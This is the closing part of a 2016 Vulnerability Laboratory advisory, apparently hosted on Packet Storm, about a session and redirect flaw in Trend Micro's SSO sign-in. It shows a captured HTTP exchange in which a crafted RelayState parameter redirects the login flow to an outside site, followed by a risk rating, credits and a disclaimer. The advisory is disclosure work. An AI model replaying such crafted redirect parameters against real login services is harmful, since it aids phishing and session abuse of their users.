Gecko/20100101 Firefox/44.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]

Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
Cookie[B=]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 11:52:31 GMT]
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
Server[ATS]
Location[https://www.yahoo.com/my_account/]
Content-Type[text/html]
Content-Language[en]
Cache-Control[no-store, no-cache]

y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
Content-Length[382]
X-Firefox-Spdy[h2]


Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
trend micro sso online service web-application is estimated as high.
(CVSS 6.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution
Security GmbH]
[https://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@vulnerability-lab.com -
research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab -
facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a
permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close